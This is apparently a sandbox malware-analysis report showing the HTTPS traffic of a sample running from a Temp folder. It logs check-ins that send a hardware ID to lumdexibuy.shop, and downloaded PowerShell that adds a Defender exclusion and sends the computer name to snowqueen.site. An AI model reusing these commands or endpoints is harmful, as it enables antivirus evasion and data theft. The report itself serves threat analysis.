                                                                                                                                      2024-11-29 14:12:54 UTC15331OUTData Raw: 2d 2d 30 38 32 4d 58 4c 48 4b 34 4b 4e 33 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 30 33 39 43 32 34 46 45 38 38 46 31 43 44 32 44 36 34 39 36 35 34 42 43 33 39 38 45 32 33 44 0d 0a 2d 2d 30 38 32 4d 58 4c 48 4b 34 4b 4e 33 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 30 38 32 4d 58 4c 48 4b 34 4b 4e 33 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 4b 41 53 54 41 0d 0a 2d 2d 30 38 32 4d 58 4c 48 4b 34 4b 4e
                                                                                                                                      Data Ascii: --082MXLHK4KN3NContent-Disposition: form-data; name="hwid"B039C24FE88F1CD2D649654BC398E23D--082MXLHK4KN3NContent-Disposition: form-data; name="pid"3--082MXLHK4KN3NContent-Disposition: form-data; name="lid"hRjzG3--KASTA--082MXLHK4KN
                                                                                                                                      2024-11-29 14:12:54 UTC5206OUTData Raw: 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                      Data Ascii: Wun 4F([:7s~X`nO`i
                                                                                                                                      2024-11-29 14:12:57 UTC1011INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 14:12:57 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=577eddagcinbel574463pkcr3i; expires=Tue, 25-Mar-2025 07:59:33 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w54pLtVgViWqB%2FsywSpRyuyB82t5kDy9SKXGnnqQJNO9SqioOkka156uzWKucAVA0aGXwVxMCOH2q352o233TtYGB2KhKwezQTAZ9C6f06hTVPvqliuaocu0EKI91r9ucOM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8ea332000efdf799-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1486&min_rtt=1477&rtt_var=572&sent=14&recv=25&lost=0&retrans=0&sent_bytes=2836&recv_bytes=21493&delivery_rate=1882656&cwnd=59&unsent_bytes=0&cid=2b1949cacf6ba940&ts=3092&x=0"
                                                                                                                                      2024-11-29 14:12:57 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                                                                                      Data Ascii: fok 8.46.123.228
                                                                                                                                      2024-11-29 14:12:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      5192.168.2.549809104.21.63.2294436180C:\Users\user\AppData\Local\Temp\108941\Contrast.com
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 14:12:58 UTC276OUTPOST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: multipart/form-data; boundary=YQUFHPP0DGAK0A
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 7064
                                                                                                                                      Host: lumdexibuy.shop
                                                                                                                                      2024-11-29 14:12:58 UTC7064OUTData Raw: 2d 2d 59 51 55 46 48 50 50 30 44 47 41 4b 30 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 30 33 39 43 32 34 46 45 38 38 46 31 43 44 32 44 36 34 39 36 35 34 42 43 33 39 38 45 32 33 44 0d 0a 2d 2d 59 51 55 46 48 50 50 30 44 47 41 4b 30 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 59 51 55 46 48 50 50 30 44 47 41 4b 30 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 4b 41 53 54 41 0d 0a 2d 2d 59 51 55 46 48 50 50 30
                                                                                                                                      Data Ascii: --YQUFHPP0DGAK0AContent-Disposition: form-data; name="hwid"B039C24FE88F1CD2D649654BC398E23D--YQUFHPP0DGAK0AContent-Disposition: form-data; name="pid"1--YQUFHPP0DGAK0AContent-Disposition: form-data; name="lid"hRjzG3--KASTA--YQUFHPP0
                                                                                                                                      2024-11-29 14:13:01 UTC1010INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 14:13:01 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=vohp3ejnnhtqvbqi2c6gnbisdk; expires=Tue, 25-Mar-2025 07:59:38 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5HfWptYP4HdsnxEk34VwDb2Z36bC19Bw3oLx9CU4ic3vLC9elXI6Srrecr0WsMRBOlLfqMYqJ8kpLL1zkgVELsLafVcaLz2BGZRO3cHXBZDe8AjTe%2FrdJP2fvlCE51IafZk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8ea3321c09b143b0-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1589&min_rtt=1579&rtt_var=613&sent=7&recv=13&lost=0&retrans=0&sent_bytes=2835&recv_bytes=7976&delivery_rate=1755862&cwnd=215&unsent_bytes=0&cid=a6457cc786f9c8bf&ts=2870&x=0"
                                                                                                                                      2024-11-29 14:13:01 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                                                                                      Data Ascii: fok 8.46.123.228
                                                                                                                                      2024-11-29 14:13:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      6192.168.2.549819104.21.63.2294436180C:\Users\user\AppData\Local\Temp\108941\Contrast.com
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 14:13:02 UTC278OUTPOST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: multipart/form-data; boundary=HX3TOI8KOQNOLIDM
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 1214
                                                                                                                                      Host: lumdexibuy.shop
                                                                                                                                      2024-11-29 14:13:02 UTC1214OUTData Raw: 2d 2d 48 58 33 54 4f 49 38 4b 4f 51 4e 4f 4c 49 44 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 30 33 39 43 32 34 46 45 38 38 46 31 43 44 32 44 36 34 39 36 35 34 42 43 33 39 38 45 32 33 44 0d 0a 2d 2d 48 58 33 54 4f 49 38 4b 4f 51 4e 4f 4c 49 44 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 48 58 33 54 4f 49 38 4b 4f 51 4e 4f 4c 49 44 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 4b 41 53 54 41 0d 0a 2d 2d 48 58
                                                                                                                                      Data Ascii: --HX3TOI8KOQNOLIDMContent-Disposition: form-data; name="hwid"B039C24FE88F1CD2D649654BC398E23D--HX3TOI8KOQNOLIDMContent-Disposition: form-data; name="pid"1--HX3TOI8KOQNOLIDMContent-Disposition: form-data; name="lid"hRjzG3--KASTA--HX
                                                                                                                                      2024-11-29 14:13:05 UTC1007INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 14:13:05 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=2d2u8vsr0k9djb322v1d7kfjle; expires=Tue, 25-Mar-2025 07:59:42 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2GN5r7T2o9cAyeN1A9Pmuyh3NQXRZqZ2soMe9BI2KuhN9z37gtcP74UQ4gW2FkKwH1ewYVL7YAbwW2rXQr2duxxtwN5z6gzPTP0uHP1DbQ7G8DhOOp9nib2JoFHs3o4RnnQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8ea332369c0d1795-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1496&min_rtt=1490&rtt_var=571&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=2128&delivery_rate=1897335&cwnd=172&unsent_bytes=0&cid=e57b3345a4259166&ts=2512&x=0"
                                                                                                                                      2024-11-29 14:13:05 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                                                                                      Data Ascii: fok 8.46.123.228
                                                                                                                                      2024-11-29 14:13:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      7192.168.2.549826104.21.63.2294436180C:\Users\user\AppData\Local\Temp\108941\Contrast.com
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 14:13:06 UTC275OUTPOST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: multipart/form-data; boundary=PTOPGS84MNK72
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 1105
                                                                                                                                      Host: lumdexibuy.shop
                                                                                                                                      2024-11-29 14:13:06 UTC1105OUTData Raw: 2d 2d 50 54 4f 50 47 53 38 34 4d 4e 4b 37 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 30 33 39 43 32 34 46 45 38 38 46 31 43 44 32 44 36 34 39 36 35 34 42 43 33 39 38 45 32 33 44 0d 0a 2d 2d 50 54 4f 50 47 53 38 34 4d 4e 4b 37 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 50 54 4f 50 47 53 38 34 4d 4e 4b 37 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 4b 41 53 54 41 0d 0a 2d 2d 50 54 4f 50 47 53 38 34 4d 4e 4b
                                                                                                                                      Data Ascii: --PTOPGS84MNK72Content-Disposition: form-data; name="hwid"B039C24FE88F1CD2D649654BC398E23D--PTOPGS84MNK72Content-Disposition: form-data; name="pid"1--PTOPGS84MNK72Content-Disposition: form-data; name="lid"hRjzG3--KASTA--PTOPGS84MNK
                                                                                                                                      2024-11-29 14:13:09 UTC1009INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 14:13:09 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=unnmekofebtaa4fa3mh6pn66rg; expires=Tue, 25-Mar-2025 07:59:46 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VCeRpmruadhyyuMR5AMbz9RN4LJRjMzWG80eqTF%2FZG78Ppf98gCVEoreBTwk9GLsYehNBfQc60cnWX56Ckxx7GMk7ixrgIjOMCaZPrrTPsSj02YSAifOybcHzSWGuUq9LTQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8ea3324ebbaf7c7c-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1811&min_rtt=1805&rtt_var=690&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2834&recv_bytes=2016&delivery_rate=1572428&cwnd=252&unsent_bytes=0&cid=7e76dcf853d22780&ts=2988&x=0"
                                                                                                                                      2024-11-29 14:13:09 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                                                                                      Data Ascii: fok 8.46.123.228
                                                                                                                                      2024-11-29 14:13:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      8192.168.2.549837104.21.63.2294436180C:\Users\user\AppData\Local\Temp\108941\Contrast.com
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 14:13:11 UTC264OUTPOST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 114
                                                                                                                                      Host: lumdexibuy.shop
                                                                                                                                      2024-11-29 14:13:11 UTC114OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 4b 41 53 54 41 26 6a 3d 37 35 36 37 66 66 66 35 34 36 38 66 35 62 36 38 32 37 38 30 61 65 61 34 63 32 65 62 36 32 36 36 26 68 77 69 64 3d 42 30 33 39 43 32 34 46 45 38 38 46 31 43 44 32 44 36 34 39 36 35 34 42 43 33 39 38 45 32 33 44
                                                                                                                                      Data Ascii: act=get_message&ver=4.0&lid=hRjzG3--KASTA&j=7567fff5468f5b682780aea4c2eb6266&hwid=B039C24FE88F1CD2D649654BC398E23D
                                                                                                                                      2024-11-29 14:13:14 UTC1017INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 14:13:13 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=c9be3r1mq9lig9ktj5aq8ofhg7; expires=Tue, 25-Mar-2025 07:59:50 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YloFk02N%2BkEppC9yDBIrpE%2BteHh%2FojyCoLFWUKswo%2B0LAOx1PuRcHxu7EYCzliJKJFyRuFa0Whmvw93vMt5JIoKo%2F8p7FpPcE3dxsQbIlXjiRFDvd1sjYDKiPNGjcmalPW4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8ea3326a4a8a42b3-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1587&min_rtt=1583&rtt_var=603&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=1014&delivery_rate=1802469&cwnd=236&unsent_bytes=0&cid=af45dd751f7d6cbb&ts=2950&x=0"
                                                                                                                                      2024-11-29 14:13:14 UTC352INData Raw: 31 61 30 0d 0a 59 43 6b 6e 65 62 37 73 56 39 50 52 36 49 70 73 52 61 6c 30 46 31 30 77 49 45 63 4f 6c 72 41 37 6a 70 6a 69 45 50 34 79 76 4f 59 37 55 67 55 4d 6e 4e 5a 31 75 36 57 63 2b 68 39 2f 39 56 74 4c 63 6b 42 42 4e 48 72 7a 30 6c 4c 67 74 6f 46 2f 6b 32 36 54 6c 41 46 65 65 31 62 62 6e 68 75 4c 35 72 33 35 4f 47 65 46 56 6e 45 70 45 68 70 31 49 72 54 56 47 62 53 6f 6e 7a 79 46 45 4d 6e 45 57 67 74 50 44 63 71 63 4a 4f 6d 4e 78 39 5a 44 4a 73 30 61 4a 6e 4e 41 53 54 39 72 2b 70 31 49 2b 76 65 51 61 64 42 42 31 49 6b 51 64 51 67 34 2f 39 73 44 68 5a 33 64 73 6a 78 38 6e 7a 70 66 44 58 74 31 44 7a 32 68 39 68 58 73 38 59 77 79 30 68 44 61 6b 6b 49 54 46 31 57 63 69 58 58 70 34 5a 57 6d 46 32 66 63 56 69 31 2f 57 46 51 7a 66 75 57 4b 5a 36 48 45 7a 57
                                                                                                                                      Data Ascii: 1a0YCkneb7sV9PR6IpsRal0F10wIEcOlrA7jpjiEP4yvOY7UgUMnNZ1u6Wc+h9/9VtLckBBNHrz0lLgtoF/k26TlAFee1bbnhuL5r35OGeFVnEpEhp1IrTVGbSonzyFEMnEWgtPDcqcJOmNx9ZDJs0aJnNAST9r+p1I+veQadBB1IkQdQg4/9sDhZ3dsjx8nzpfDXt1Dz2h9hXs8Ywy0hDakkITF1WciXXp4ZWmF2fcVi1/WFQzfuWKZ6HEzW
                                                                                                                                      2024-11-29 14:13:14 UTC71INData Raw: 4c 69 43 32 6d 74 70 48 6f 46 53 79 52 57 6d 51 31 58 31 41 62 49 66 2f 65 54 39 48 37 6a 6d 43 68 58 74 69 55 50 31 70 50 47 4a 43 59 4c 36 66 7a 78 4b 67 4b 4d 59 74 4f 4a 58 45 53 52 57 55 30 70 38 31 6d 0d 0a
                                                                                                                                      Data Ascii: LiC2mtpHoFSyRWmQ1X1AbIf/eT9H7jmChXtiUP1pPGJCYL6fzxKgKMYtOJXESRWU0p81m
                                                                                                                                      2024-11-29 14:13:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      9192.168.2.549848104.20.4.2354436180C:\Users\user\AppData\Local\Temp\108941\Contrast.com
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 14:13:15 UTC199OUTGET /raw/erLX7UsT HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Host: pastebin.com
                                                                                                                                      2024-11-29 14:13:16 UTC391INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 14:13:16 GMT
                                                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      x-frame-options: DENY
                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                      x-xss-protection: 1;mode=block
                                                                                                                                      cache-control: public, max-age=1801
                                                                                                                                      CF-Cache-Status: EXPIRED
                                                                                                                                      Last-Modified: Fri, 29 Nov 2024 14:13:16 GMT
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8ea33285cba71a30-EWR
                                                                                                                                      2024-11-29 14:13:16 UTC626INData Raw: 32 36 62 0d 0a 24 6d 33 78 38 79 6b 32 6a 35 71 37 3d 22 41 64 64 2d 4d 70 50 72 65 66 65 72 65 6e 63 65 20 2d 45 78 63 6c 75 73 69 6f 6e 50 61 74 68 20 22 3b 24 61 31 6b 39 7a 73 37 64 36 66 68 3d 5b 53 79 73 74 65 6d 2e 54 65 78 74 2e 45 6e 63 6f 64 69 6e 67 5d 3a 3a 41 53 43 49 49 2e 47 65 74 42 79 74 65 73 28 22 55 6e 69 71 75 65 53 74 72 69 6e 67 31 22 29 3b 24 77 32 66 68 36 7a 6b 33 6c 39 6a 79 3d 28 24 6d 33 78 38 79 6b 32 6a 35 71 37 2b 22 27 24 65 6e 76 3a 54 45 4d 50 27 22 29 3b 24 70 39 6c 6b 37 7a 64 35 6a 33 78 3d 5b 53 79 73 74 65 6d 2e 54 65 78 74 2e 45 6e 63 6f 64 69 6e 67 5d 3a 3a 41 53 43 49 49 2e 47 65 74 53 74 72 69 6e 67 28 24 61 31 6b 39 7a 73 37 64 36 66 68 29 3b 24 76 34 6a 6b 38 78 37 6c 32 66 68 3d 28 24 6d 33 78 38 79 6b 32 6a
                                                                                                                                      Data Ascii: 26b$m3x8yk2j5q7="Add-MpPreference -ExclusionPath ";$a1k9zs7d6fh=[System.Text.Encoding]::ASCII.GetBytes("UniqueString1");$w2fh6zk3l9jy=($m3x8yk2j5q7+"'$env:TEMP'");$p9lk7zd5j3x=[System.Text.Encoding]::ASCII.GetString($a1k9zs7d6fh);$v4jk8x7l2fh=($m3x8yk2j
                                                                                                                                      2024-11-29 14:13:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      10192.168.2.549854104.21.58.94436180C:\Users\user\AppData\Local\Temp\108941\Contrast.com
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 14:13:18 UTC203OUTGET /4b882c8/script HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Host: silversky.club
                                                                                                                                      2024-11-29 14:13:18 UTC835INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 14:13:18 GMT
                                                                                                                                      Content-Length: 331
                                                                                                                                      Connection: close
                                                                                                                                      Last-Modified: Mon, 18 Nov 2024 21:17:30 GMT
                                                                                                                                      ETag: "14b-6273671bd049a"
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ofxKOtmqjUjNWzFwIL7D6nplulSXZvQj02%2BK2y4zf4ZoKMe7Kh3jrwC14tAkgSJqoVrKZr0ayNdo97QFCb%2B298eYohByWzC1qx5JOqVE9XfVRiFRGabnG8dmKe4bJJGUYQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8ea332957930191e-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1603&min_rtt=1598&rtt_var=609&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2834&recv_bytes=817&delivery_rate=1781574&cwnd=238&unsent_bytes=0&cid=fa3f95e06bf39ab7&ts=707&x=0"
                                                                                                                                      2024-11-29 14:13:18 UTC331INData Raw: 5b 4e 65 74 2e 73 65 72 76 69 63 65 70 4f 49 4e 54 6d 41 4e 61 47 65 72 5d 3a 3a 53 45 63 55 52 69 54 79 50 72 4f 74 6f 43 4f 6c 20 3d 20 5b 4e 65 74 2e 53 65 63 55 72 69 54 79 70 72 4f 74 6f 63 6f 6c 74 59 50 65 5d 3a 3a 74 4c 73 31 32 3b 20 24 67 44 3d 27 68 74 74 70 73 3a 2f 2f 73 6e 6f 77 71 75 65 65 6e 2e 73 69 74 65 2f 63 61 6c 6c 69 6e 67 2e 70 68 70 3f 63 6f 6d 70 4e 61 6d 65 3d 27 2b 24 65 6e 76 3a 63 6f 6d 70 75 74 65 72 6e 61 6d 65 3b 20 24 70 54 53 72 20 3d 20 69 57 72 20 2d 75 52 69 20 24 67 44 20 2d 75 53 65 62 41 53 49 63 70 41 52 73 69 4e 67 20 2d 55 73 45 72 41 47 65 6e 74 20 27 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f
                                                                                                                                      Data Ascii: [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://snowqueen.site/calling.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/


                                                                                                                                      Click to jump to process

                                                                                                                                      Click to jump to process

                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                      Click to jump to process

